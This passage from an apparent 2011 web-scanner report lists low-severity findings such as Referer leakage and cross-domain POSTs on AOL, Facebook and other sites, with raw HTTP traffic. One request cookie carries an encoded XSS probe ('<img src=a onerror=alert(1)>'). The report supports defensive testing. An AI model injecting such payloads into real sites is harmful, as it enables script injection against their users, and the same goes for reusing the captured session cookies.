Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; lsd=zTWKd; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; datr=ituyTcnawc6q7VcE0gibPCo2; act=1304613672018%2F1; L=2; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fterms.php%3Fref%3Dpf; wd=1022x1007

Response 2

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: reg_fb_ref=https%3A%2F%2Fwww.facebook.com%2Fhelp%2Fcontact.php%3Fshow_form%3Dcannot_identify%26flow%3Dpw_reset; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.32.193.121
X-Cnection: close
Date: Thu, 05 May 2011 11:45:55 GMT
Content-Length: 23679

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<label class="uiButton uiButtonConfirm" for="u595513_3"><input value="Login" tabindex="4" type="submit" id="u595513_3" /></label></td></tr><tr><td class="login_form_label_field"><input type="checkbox" class="inputcheckbox" value="1" id="persistent" name="persistent" tabindex="3" /><input type="hidden" name="default_persistent" value="0" /><label id="label_persistent" for="persistent">Keep me logged in</label></td><td class="login_form_label_field"><a href="http://www.facebook.com/recover.php" rel="nofollow">Forgot your password?</a></td></tr></table><input type="hidden" id="next" name="next" value="https://www.facebook.com/help/contact.php?show_form=cannot_identify&flow=pw_reset" autocomplete="off" /><input type="hidden" name="charset_test" value="€,´,...,..,...,..,.." /><input type="hidden" id="lsd" name="lsd" value="zTWKd" autocomplete="off" /></form>
</div></div></div></div><div id="dropmenu_container"></div><div id="content" class="fb_content clearfix"><div class="UIFullPage_Container"><div class="mvl ptm uiInterstitial help_form uiInterstitialLarge uiBoxWhite"><div class="uiHeader uiHeaderBottomBorder mhl mts uiHeaderPage interstitialHeader"><div class="clearfix uiHeaderTop"><div class="uiHeaderActions rfloat"></div><div><h2 class="uiHeaderTitle">I Cannot Identify My Account</h2></div></div></div><div class="phl ptm uiInterstitialContent"><form method="post" action="https://www.facebook.com/help/contact.php?show_form=cannot_identify&cant_identify=0" id="helpform" onsubmit="return Event.__inlineSubmit(this,event)" enctype="multipart/form-data" class="cannot_identify"><input type="hidden" name="charset_test" value="€,´,...,..,...,..,.." /><input type="hidden" name="lsd" value="zTWKd" autocomplete="off" /><input type="hidden" id="redirect" name="redirect" value="http://www.facebook.com/help/?mail_sent" autocomplete="off" /><table id="dialog" border="0" cellspacing="0" width="510"><tbody><tr><td class="dialog"><div class="instructions">Please fill out this form if you are unable to
...[SNIP]...

14.12. http://www.huffingtonpost.com/ previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.huffingtonpost.com
Path:	/

Request 1

GET / HTTP/1.1
Host: www.huffingtonpost.com
Proxy-Connection: keep-alive
Referer: http://www.aol.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: huffpost_influence_null=%7B%22commented%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22blogged%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22shared%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22emailed%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22bages%22%3Anull%7D; huffpost_adssale=y; __utmz=265287574.1304575105.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_pers=%20s_getnr%3D1304575104613-New%7C1367647104613%3B%20s_nrgvo%3DNew%7C1367647104615%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; __qseg=Q_D|Q_T|Q_2689|Q_2687|Q_2685|Q_1908|Q_1905|Q_1592|Q_683|Q_680|Q_679|Q_678|Q_666|Q_665|Q_657; __qca=P0-822287727-1304575116403; __utma=265287574.457433518.1304575105.1304575105.1304575105.1; __utmc=265287574; __utmv=265287574.|3=User=A=1,4=JoinedOn=0=1,; __utmb=265287574.3.10.1304575105

Response 1

HTTP/1.1 200 OK
Server: Apache/2.2.8 (Unix)
Content-Type: text/html; charset=utf-8
Set-Cookie: is_aol_user=1; 0; path=/;
Vary: Accept-Encoding
Cache-Control: max-age=24
Date: Thu, 05 May 2011 01:00:04 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 269167

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>

   <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1" />
   <meta name="Title" content="The Huffington Post - Breaking News and Opinion" />
   <meta name="Description" content="Breaking News and Opinion" />
   <meta name="Keywords" content="news, breaking news, news blog, business, sports, politics, technology, entertainment, living" />
       <title>Breaking News and Opinion on The Huffington Post</title>
<meta property="og:site_name" content="The Huffington Post"/>
       <meta property="fb:app_id" content="46744042133"/>
<meta property="og:type" content="blog"/>

<link rel="shortcut icon" href="/favicon.ico" />


   <link rel="stylesheet" href="http://s.huffpost.com/assets/css.php?f=fonts%2Fhelvetica%2Fstylesheet.css%2Chp_modules%2Ftop_nav.css%2Cverticals%2Fhomepage.css%2Cfrontpage.css%2Cbasic.css%2Call_pages.css%2Cverticals%2Fcolor_scheme.css%2Cadd%2Ffront.css%2Cbuttons.css%2Cmost_popular.css&v46770" type="text/css" media="screen" /><link rel="stylesheet" href="http://s.huffpost.com/assets/css.php?f=commercial.css%2Csnp_friends.css%2Csnn-header.css%2Chp_modules%2Fmodule.splash_slideshow.css%2Chp_modules%2Fmodule.apps_feeds.css%2Chufflists.css%2Csignup_modal.css%2Cdirect_message.css%2Cbadges_v2.css%2Chp_modules%2Ffacebook.css%2Cuser_levels.css%2Ctwitter_splash.css%2Cbing.css%2Cgrouping.css%2Cmodal_frames.css%2Chp_modules%2Fmodule.bubble.css%2Cemail_share.css&v46755" type="text/css" medi
...[SNIP]...

Request 2

GET / HTTP/1.1
Host: www.huffingtonpost.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: huffpost_influence_null=%7B%22commented%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22blogged%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22shared%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22emailed%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22bages%22%3Anull%7D; huffpost_adssale=y; __utmz=265287574.1304575105.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_pers=%20s_getnr%3D1304575104613-New%7C1367647104613%3B%20s_nrgvo%3DNew%7C1367647104615%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; __qseg=Q_D|Q_T|Q_2689|Q_2687|Q_2685|Q_1908|Q_1905|Q_1592|Q_683|Q_680|Q_679|Q_678|Q_666|Q_665|Q_657; __qca=P0-822287727-1304575116403; __utma=265287574.457433518.1304575105.1304575105.1304575105.1; __utmc=265287574; __utmv=265287574.|3=User=A=1,4=JoinedOn=0=1,; __utmb=265287574.3.10.1304575105

Response 2

HTTP/1.1 200 OK
Server: Apache/2.2.8 (Unix)
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Cache-Control: max-age=8
Date: Thu, 05 May 2011 01:00:20 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 268731

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>

   <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1" />
   <meta name="Title" content="The Huffington Post - Breaking News and Opinion" />
   <meta name="Description" content="Breaking News and Opinion" />
   <meta name="Keywords" content="news, breaking news, news blog, business, sports, politics, technology, entertainment, living" />
       <title>Breaking News and Opinion on The Huffington Post</title>
<meta property="og:site_name" content="The Huffington Post"/>
       <meta property="fb:app_id" content="46744042133"/>
<meta property="og:type" content="blog"/>

<link rel="shortcut icon" href="/favicon.ico" />


   <link rel="stylesheet" href="http://s.huffpost.com/assets/css.php?f=fonts%2Fhelvetica%2Fstylesheet.css%2Chp_modules%2Ftop_nav.css%2Cverticals%2Fhomepage.css%2Cfrontpage.css%2Cbasic.css%2Call_pages.css%2Cverticals%2Fcolor_scheme.css%2Cadd%2Ffront.css%2Cbuttons.css%2Cmost_popular.css&v46770" type="text/css" media="screen" /><link rel="stylesheet" href="http://s.huffpost.com/assets/css.php?f=commercial.css%2Csnp_friends.css%2Csnn-header.css%2Chp_modules%2Fmodule.splash_slideshow.css%2Chp_modules%2Fmodule.apps_feeds.css%2Chufflists.css%2Csignup_modal.css%2Cdirect_message.css%2Cbadges_v2.css%2Chp_modules%2Ffacebook.css%2Cuser_levels.css%2Ctwitter_splash.css%2Cbing.css%2Cgrouping.css%2Cmodal_frames.css%2Chp_modules%2Fmodule.bubble.css%2Cemail_share.css&v46755" type="text/css" media="screen" />

<link rel="alte
...[SNIP]...

14.13. http://www.tuaw.com/hub/app-reviews previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.tuaw.com
Path:	/hub/app-reviews

Request 1

Response 1

Request 2

GET /hub/app-reviews HTTP/1.1
Host: www.tuaw.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 13:06:20 GMT
Server: Apache/2.2
Cache-Control: max-age=60
Set-Cookie: GEO-173_193_214_243=usa%3A%3Adallas%3A%3A032.787%3A%3A-096.799%3A%3Abroadband%3A%3Atx; expires=Thu, 05-May-2011 14:06:20 GMT; path=/
Content-Type: text/html
Content-Length: 32282

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>iPhone and iPod touc
...[SNIP]...
<scr' + 'ipt src="http://www.tuaw.com/traffic/' + '?t=js&bv=&os=&tz=&lg=&rv=&rsv=&pw=%2Fhub%2Fapp-reviews%2F&cb=997815769" type="text/javascript"></scr' + 'ipt>');
// -->
</script><noscript><img src="http://www.tuaw.com/traffic/?t=px&bv=JavaScript+Disabled&os=&tz=default&lg=&rv=&rsv=&pw=%2Fhub%2Fapp-reviews%2F&cb=101099787" alt="the end" width="1" height="1"border="0" /></noscript>

15. Cross-domain POST previous next
There are 3 instances of this issue:

http://www.dailyfinance.com/
http://www.dailyfinance.com/markets/mostactives
http://www.lakewoodbeacon.org/

Issue background

The POSTing of data between domains does not necessarily constitute a security vulnerability. You should review the contents of the information that is being transmitted between domains, and determine whether the originating application should be trusting the receiving domain with this information.

15.1. http://www.dailyfinance.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.dailyfinance.com
Path:	/

Issue detail

The page contains a form which POSTs data to the domain search.aol.com. The form contains the following fields:

query
submit

Request

Response

15.2. http://www.dailyfinance.com/markets/mostactives previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.dailyfinance.com
Path:	/markets/mostactives

Issue detail

The page contains a form which POSTs data to the domain search.aol.com. The form contains the following fields:

query
submit

Request

GET /markets/mostactives HTTP/1.1
Host: www.dailyfinance.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: GEO-173_193_214_243_64_12_173_49=usa%3A%3Astowe%3A%3A044.500%3A%3A-072.646%3A%3Abroadband%3A%3Avt; AOL_StockQuotesLiveUpdate=1; s_pers=%20s_getnr%3D1304575093082-New%7C1367647093082%3B%20s_nrgvo%3DNew%7C1367647093084%3B; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.95b2; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.95b2;

Response

15.3. http://www.lakewoodbeacon.org/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.lakewoodbeacon.org
Path:	/

Issue detail

The page contains a form which POSTs data to the domain visitor.r20.constantcontact.com. The form contains the following fields:

Request

GET / HTTP/1.1
Host: www.lakewoodbeacon.org
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:57:31 GMT
Content-Type: text/html
Connection: keep-alive
Server: Apache/Nginx/Varnish
Last-Modified: Tue, 03 May 2011 20:48:46 GMT
ETag: "b4a07965-30b8-4a2654432b8de"
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 12472

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><!-- InstanceBegin template="/Templ
...[SNIP]...
<div style="width:160px; background-color: #ffffff;">
<form name="ccoptin" action="http://visitor.r20.constantcontact.com/d.jsp" target="_blank" method="post" style="margin-bottom:3;"><span style="background-color: #666600; float:right;margin-right:5;margin-top:3">
...[SNIP]...

16. Cross-domain Referer leakage previous next
There are 96 instances of this issue:

http://www.aol.com/ajax.jsp
http://www.aol.com/ajax.jsp
http://www.aol.com/ajax.jsp
http://www.aol.com/ajax.jsp
http://www.aol.com/ajax.jsp
http://www.aol.com/ajax.jsp
http://www.aol.com/ajax.jsp
http://www.aol.com/ajax.jsp
http://www.aol.com/ajax.jsp
http://www.aol.com/ajax.jsp
http://www.aol.com/ajax.jsp
http://www.aol.com/ajax.jsp
http://www.aol.com/ajax.jsp
http://www.aol.com/ajax.jsp
http://www.aol.com/ajax.jsp
http://www.aol.com/ajax.jsp
http://www.aol.com/ajax.jsp
http://www.aol.com/ajax.jsp
http://www.aol.com/ajax.jsp
http://www.aol.com/ajax.jsp
http://www.aol.com/ajax.jsp
http://www.aol.com/ajax.jsp
http://www.aol.com/ajax.jsp
http://www.aol.com/ajax.jsp
http://www.apple.com/itunes/affiliates/download/
http://www.blogsmithmedia.com/www.citysbest.com/include/citysbest-min.js
http://www.blogsmithmedia.com/www.dailyfinance.com/include/dailyfinance.js
http://www.citysbest.com/
http://www.dailyfinance.com/
http://www.facebook.com/BPAmerica
http://www.facebook.com/ajax/intl/language_dialog.php
http://www.facebook.com/careers/
http://www.facebook.com/find-friends
http://www.facebook.com/find-friends
http://www.facebook.com/help/
http://www.facebook.com/help/
http://www.facebook.com/help/
http://www.facebook.com/login.php
http://www.facebook.com/mobile/
http://www.facebook.com/mobile/
http://www.facebook.com/pages/create.php
http://www.facebook.com/plugins/activity.php
http://www.facebook.com/plugins/activity.php
http://www.facebook.com/plugins/activity.php
http://www.facebook.com/plugins/activity.php
http://www.facebook.com/plugins/comments.php
http://www.facebook.com/plugins/comments.php
http://www.facebook.com/plugins/comments.php
http://www.facebook.com/plugins/facepile.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/likebox.php
http://www.facebook.com/plugins/likebox.php
http://www.facebook.com/plugins/likebox.php
http://www.facebook.com/plugins/likebox.php
http://www.facebook.com/plugins/likebox.php
http://www.facebook.com/plugins/likebox.php
http://www.facebook.com/plugins/likebox.php
http://www.facebook.com/plugins/likebox.php
http://www.facebook.com/plugins/likebox.php
http://www.facebook.com/plugins/likebox.php
http://www.facebook.com/plugins/likebox.php
http://www.facebook.com/plugins/likebox.php
http://www.facebook.com/plugins/likebox.php
http://www.facebook.com/plugins/likebox.php
http://www.facebook.com/plugins/likebox.php
http://www.facebook.com/plugins/likebox.php
http://www.facebook.com/plugins/recommendations.php
http://www.facebook.com/plugins/recommendations.php
http://www.facebook.com/plugins/recommendations.php
http://www.facebook.com/plugins/send.php
http://www.facebook.com/plugins/send.php
http://www.facebook.com/r.php
http://www.facebook.com/r.php
http://www.facebook.com/share.php
http://www.facebook.com/sharer.php
http://www.facebook.com/terms.php
http://www.facebook.com/terms.php
http://www.flickr.com/badge_code_v2.gne
http://www.games.com/game/family-feud/
http://www.google.com/search
http://www.google.com/url
http://www.google.com/url
http://www.google.com/webhp
http://www.huffingtonpost.com/
http://www.huffingtonpost.com/
http://www.huffingtonpost.com/
http://www.huffingtonpost.com/blogs_front.html
http://www.huffingtonpost.com/news_col_1.html
http://www.huffingtonpost.com/news_col_2.html
http://www.huffingtonpost.com/permalink-tracker.html
http://www.huffingtonpost.com/threeup.php
http://www.mapquest.com/
http://www.mapquest.com/
http://www.mmafighting.com/2011/05/04/former-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11/
http://yellowpages.aol.com/

Issue background

When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.

If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.

You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.

Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.

Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.

Issue remediation

The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.

16.1. http://www.aol.com/ajax.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.aol.com
Path:	/ajax.jsp

Issue detail

The page was loaded from a URL containing a query string:

http://www.aol.com/ajax.jsp?m=dynamiclead&p=dynamicleadslide&vbclass=vid_over&dlNo=5&ajax=1&sitHot=&offset=0&slot=dynamiclead&vcslot=dynamiclead-video-config

The response contains the following links to other domains:

http://o.aolcdn.com/hss/storage/adam/bdbcc7701dc2de04075043ac486f24d7/woman-man-bed-386ds050311.jpg
http://www.everydayhealth.com/allergy/climate-change-and-allergies.aspx?xid=aol_eh-allergies_41-_20100502
http://www.everydayhealth.com/heart-disease/cholesterol/drug-treatments-for-high-cholesterol.aspx?xid=aol_eh-chol_8-_20100502
http://www.everydayhealth.com/kids-health/0504/tvs-common-in-daycare-centers-flouting-guidelines.aspx?xid=aol_eh-parent_53-_20100502
http://www.everydayhealth.com/sexual-health/sexual-dysfunction/additional-treatments-for-female-sexual-arousal-disorder.aspx?xid=aol_eh-sex_30-_20100502

Request

GET /ajax.jsp?m=dynamiclead&p=dynamicleadslide&vbclass=vid_over&dlNo=5&ajax=1&sitHot=&offset=0&slot=dynamiclead&vcslot=dynamiclead-video-config HTTP/1.1
Host: www.aol.com
Proxy-Connection: keep-alive
Referer: http://www.aol.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26D984D8851D3687-40000131C03E6937[CE]; tst=%2C1%2Cs391a%3A%2C1%2Cs392a%3A%2C1%2Cs393a%3A%2C1%2Cs394a%3A%2C1%2Cs395a%3A%2C1%2Cs396a%3A%2C1%2Cs397a; rrpmo1=rr1~3~1304556981389~0; stips5=1; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; s_pers=%20s_getnr%3D1304575026058-Repeat%7C1367647026058%3B%20s_nrgvo%3DRepeat%7C1367647026064%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; dlact=dl4

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:57:16 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache, no-store, private, max-age=0
Expires: 0
R-Host: vm-149-174-25-41.asset.aol.com
Content-Type: text/javascript;charset=UTF-8
Cteonnt-Length: 2855
Set-Cookie: JSESSIONID=E5F05FD7FA8545D74DDA7349E8CA720E; Path=/aol
Content-Length: 2855

<span class="dn" id="#curr-dlcount">13</span>
<span id="slduration" title="10000"></span>
<div class="mnid-dl5 plid-60533 display-lightbox">
<span class="dn" id="dl-vid"></
...[SNIP]...
</span>
<a id="dlimg" name="om_dl5_image" class="photo-link lnid-sec1_lnk1 icid-maing-grid7|main5|dl5|sec1_lnk1|60533" href="http://www.everydayhealth.com/sexual-health/sexual-dysfunction/additional-treatments-for-female-sexual-arousal-disorder.aspx?xid=aol_eh-sex_30-_20100502"><img height="217" width="386" src="http://o.aolcdn.com/hss/storage/adam/bdbcc7701dc2de04075043ac486f24d7/woman-man-bed-386ds050311.jpg"/></a>
...[SNIP]...
<h2><a name="om_dl5_hdln" onclick=" " href="http://www.everydayhealth.com/sexual-health/sexual-dysfunction/additional-treatments-for-female-sexual-arousal-disorder.aspx?xid=aol_eh-sex_30-_20100502" class=" lnid-sec1_lnk2 icid-maing-grid7|main5|dl5|sec1_lnk2|60533">3 Ways to Reignite Your Sex Life
</a>
...[SNIP]...
<p class="lede-link"><a name="om_dl5_cpy" href="http://www.everydayhealth.com/sexual-health/sexual-dysfunction/additional-treatments-for-female-sexual-arousal-disorder.aspx?xid=aol_eh-sex_30-_20100502" class=" lnid-sec1_lnk3 icid-maing-grid7|main5|dl5|sec1_lnk3|60533">Issues that may be holding you back
</a>
...[SNIP]...
<li ><a name="om_dl5_slede1" class="dl-sublede-link bold lnid-sec3_lnk1 icid-maing-grid7|main5|dl5|sec3_lnk1|60533" href="http://www.everydayhealth.com/allergy/climate-change-and-allergies.aspx?xid=aol_eh-allergies_41-_20100502">Popular Theory on Allergy Sufferers
</a>
...[SNIP]...
<li ><a name="om_dl5_slede2" class="dl-sublede-link bold lnid-sec3_lnk2 icid-maing-grid7|main5|dl5|sec3_lnk2|60533" href="http://www.everydayhealth.com/kids-health/0504/tvs-common-in-daycare-centers-flouting-guidelines.aspx?xid=aol_eh-parent_53-_20100502">What Many Daycare Centers Ignore

</a>
...[SNIP]...
<li ><a name="om_dl5_slede3" class="dl-sublede-link bold lnid-sec3_lnk3 icid-maing-grid7|main5|dl5|sec3_lnk3|60533" href="http://www.everydayhealth.com/heart-disease/cholesterol/drug-treatments-for-high-cholesterol.aspx?xid=aol_eh-chol_8-_20100502">Cholesterol Medicine Even Worth It?
</a>
...[SNIP]...

16.2. http://www.aol.com/ajax.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.aol.com
Path:	/ajax.jsp

Issue detail

The page was loaded from a URL containing a query string:

http://www.aol.com/ajax.jsp?m=dynamiclead&p=dynamicleadslide&vbclass=vid_over&dlNo=6&ajax=1&sitHot=&offset=0&slot=dynamiclead&vcslot=dynamiclead-video-config

The response contains the following links to other domains:

http://i.huffpost.com/gen/273987/thumbs/a-SOAP-386x217.jpg
http://www.autoblog.com/iphone-app
http://www.walletpop.com/2010/01/26/savings-experiment-get-the-best-of-pests-for-less/
http://www.walletpop.com/2011/05/03/savings-experiment-will-body-wash-or-soap-get-you-cleaner/
http://www.walletpop.com/2011/05/04/grape-tomatoes-in-ready-made-salads-recalled-over-salmonella-fea/

Request

GET /ajax.jsp?m=dynamiclead&p=dynamicleadslide&vbclass=vid_over&dlNo=6&ajax=1&sitHot=&offset=0&slot=dynamiclead&vcslot=dynamiclead-video-config HTTP/1.1
Host: www.aol.com
Proxy-Connection: keep-alive
Referer: http://www.aol.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26D984D8851D3687-40000131C03E6937[CE]; tst=%2C1%2Cs391a%3A%2C1%2Cs392a%3A%2C1%2Cs393a%3A%2C1%2Cs394a%3A%2C1%2Cs395a%3A%2C1%2Cs396a%3A%2C1%2Cs397a; RSP_COOKIE=aid=c5999d1676b211e08f73fc32f1f68f78; s_pers=%20s_getnr%3D1304614868360-Repeat%7C1367686868360%3B%20s_nrgvo%3DRepeat%7C1367686868361%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; rrpmo1=NaN; stips5=1; dlact=dl5

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 12:02:26 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache, no-store, private, max-age=0
Expires: 0
R-Host: vm-149-174-24-44.asset.aol.com
Content-Type: text/javascript;charset=UTF-8
Cteonnt-Length: 2472
Set-Cookie: JSESSIONID=2858C39FEF947BF52C6130CD99C3D8E8; Path=/aol
Content-Length: 2472

<span class="dn" id="#curr-dlcount">11</span>
<span id="slduration" title="10000"></span>
<div class="mnid-dl6 plid-60588 display-lightbox">
<span class="dn" id="dl-vid"></
...[SNIP]...
</span>
<a id="dlimg" name="om_dl6_image" class="photo-link lnid-sec1_lnk1 icid-maing-grid7|main5|dl6|sec1_lnk1|60588" href="http://www.walletpop.com/2011/05/03/savings-experiment-will-body-wash-or-soap-get-you-cleaner/"><img height="217" alt="Soap" width="386" src="http://i.huffpost.com/gen/273987/thumbs/a-SOAP-386x217.jpg"/></a>
...[SNIP]...
<h2><a name="om_dl6_hdln" onclick=" " href="http://www.walletpop.com/2011/05/03/savings-experiment-will-body-wash-or-soap-get-you-cleaner/" class=" lnid-sec1_lnk2 icid-maing-grid7|main5|dl6|sec1_lnk2|60588">The Bummer About This Bar of Soap</a>
...[SNIP]...
<p class="lede-link"><a name="om_dl6_cpy" href="http://www.walletpop.com/2011/05/03/savings-experiment-will-body-wash-or-soap-get-you-cleaner/" class=" lnid-sec1_lnk3 icid-maing-grid7|main5|dl6|sec1_lnk3|60588">Surprising find about which is cheapest</a>
...[SNIP]...
<li ><a name="om_dl6_slede1" class="dl-sublede-link bold lnid-sec3_lnk1 icid-maing-grid7|main5|dl6|sec3_lnk1|60588" href="http://www.walletpop.com/2011/05/04/grape-tomatoes-in-ready-made-salads-recalled-over-salmonella-fea/">Common Food Ingredient Recalled</a>
...[SNIP]...
<li ><a name="om_dl6_slede2" class="dl-sublede-link bold lnid-sec3_lnk2 icid-maing-grid7|main5|dl6|sec3_lnk2|60588" href="http://www.walletpop.com/2010/01/26/savings-experiment-get-the-best-of-pests-for-less/">50-Cent Secret to Stop Bugs Cold</a>
...[SNIP]...
